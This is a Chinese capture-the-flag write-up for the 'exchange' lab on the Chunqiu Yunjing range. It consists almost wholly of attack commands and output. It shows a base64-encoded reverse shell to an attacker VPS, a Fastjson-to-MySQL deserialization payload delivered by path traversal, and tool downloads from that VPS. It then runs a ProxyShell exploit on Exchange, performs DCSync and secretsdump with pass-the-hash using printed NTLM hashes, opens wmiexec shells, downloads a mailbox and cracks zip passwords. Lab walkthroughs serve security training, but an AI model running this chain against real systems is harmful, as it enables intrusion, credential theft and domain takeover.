春秋云镜-exchange-WriteUp

{"config":{"ysoserialPath":"ysoserial-all.jar","javaBinPath":"java","fileOutputDir":"./fileOutput/","displayFileContentOnScreen":true,"saveToFile":true    },"fileread":{"win_ini":"c:\windows\win.ini","win_hosts":"c:\windows\system32\drivers\etc\hosts","win":"c:\windows\","linux_passwd":"/etc/passwd","linux_hosts":"/etc/hosts","index_php":"index.php","ssrf":"https://www.baidu.com/","__defaultFiles":["/etc/hosts","c:\windows\system32\drivers\etc\hosts"]    },"yso":{"Jdk7u21":["Jdk7u21","calc"],"CommonsCollections6":["CommonsCollections6","bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNpcC84MDA5IDA+JjEK}|{base64,-d}|{bash,-i}"]    }}

{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "vpsip", "portToConnectTo": 3306, "info": { "user": "CommonsCollections6", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }

GET /a.css/../systemConfig/list?search=%7B%20%22name%22%3A%20%7B%20%22%40type%22%3A%20%22java.lang.AutoCloseable%22%2C%20%22%40type%22%3A%20%22com.mysql.jdbc.JDBC4Connection%22%2C%20%22hostToConnectTo%22%3A%20%22vpsip%22%2C%20%22portToConnectTo%22%3A%203306%2C%20%22info%22%3A%20%7B%20%22user%22%3A%20%22CommonsCollections6%22%2C%20%22password%22%3A%20%22pass%22%2C%20%22statementInterceptors%22%3A%20%22com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%20%22autoDeserialize%22%3A%20%22true%22%2C%20%22NUM_HOSTS%22%3A%20%221%22%20%7D%20%7D&currentPage=1&pageSize=10 HTTP/1.1Host: 47.92.212.159:8000Accept: application/json, text/javascript, */*; q=0.01User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.60X-Requested-With: XMLHttpRequestReferer:http://47.116.69.14/pages/manage/systemConfig.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5Connection: close

curl http://vpsip:8001/fscan_amd64 --output fscan_amd64chmod +x ./fscan_amd64./fscan_amd64 -h 172.22.3.1/24

./fscan_amd64 -h 172.22.3.1/24
   ___                              _      / _      ___  ___ _ __ __ _  ___| | __  / /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______  (__| | | (_| | (__|   <    ____/     |___/___|_|  __,_|___|_|_                        fscan version: 1.8.2start infoscan(icmp) Target 172.22.3.12     is alive(icmp) Target 172.22.3.2      is alive(icmp) Target 172.22.3.26     is alive(icmp) Target 172.22.3.9      is alive[*] Icmp alive hosts len is: 4172.22.3.9:808 open172.22.3.12:80 open172.22.3.12:22 open172.22.3.9:8172 open172.22.3.12:8000 open172.22.3.9:445 open172.22.3.26:445 open172.22.3.2:445 open172.22.3.2:88 open172.22.3.9:443 open172.22.3.9:139 open172.22.3.2:139 open172.22.3.26:139 open172.22.3.9:135 open172.22.3.26:135 open172.22.3.2:135 open172.22.3.9:81 open172.22.3.9:80 open[*] alive ports len is: 18start vulscan[*] WebTitle: http://172.22.3.12        code:200 len:19813  title:lumia[*] NetInfo:[*]172.22.3.2   [->]XIAORANG-WIN16   [->]172.22.3.2[*] NetBios: 172.22.3.2      [+]DC XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393 [*] NetBios: 172.22.3.26     XIAORANGXIAORANG-PC           [*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)[*] NetInfo:[*]172.22.3.26   [->]XIAORANG-PC   [->]172.22.3.26[*] NetInfo:[*]172.22.3.9   [->]XIAORANG-EXC01   [->]172.22.3.9[*] WebTitle: http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html[*] NetBios: 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016 Datacenter 14393 [*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP[*] WebTitle: http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。[*] WebTitle: https://172.22.3.9:8172   code:404 len:0      title:None[*] WebTitle: http://172.22.3.9         code:403 len:0      title:None[*] WebTitle: https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook

curl http://vpsip:8001/frpc --output frpccurl http://vpsip:8001/frpc.ini --output frpc.inichmod +x ./frpcnohup ./frpc -c frpc.ini

python3 proxyshell.py -t XIAORANG-EXC01.xiaorang.lab

XIAORANG-EXC01$/e95225f6e2b6b094e532db3a02811ee2Zhangtong/22c7f81993e96ac83ac2f3f1903de8b4

./Adinfo_darwin -d xiaorang.lab --dc 172.22.3.2 -u XIAORANG-EXC01$ -H e95225f6e2b6b094e532db3a02811ee2

python3 Dcsync.py -dc XIAORANG-WIN16.xiaorang.lab -t 'CN=Zhangtong,CN=Users,DC=xiaorang,DC=lab'  'xiaorangXIAORANG-EXC01$' -hashes :e95225f6e2b6b094e532db3a02811ee2

python3 secretsdump.py [email protected] -just-dc-user administrator -hashes :22c7f81993e96ac83ac2f3f1903de8b4

python3 wmiexec.py [email protected] -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -codec gbk

python3 smbclient.py xiaorang.lab/[email protected] -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb

python3 secretsdump.py [email protected] -just-dc-user Lumia -hashes :22c7f81993e96ac83ac2f3f1903de8b4

python3 pthexchange.py --target https://172.22.3.9 --username Lumia --password "00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296" --action Download

zip2john secret.zip>zip.secjohn zip.sec --format=pkzip --wordlist=phone.lst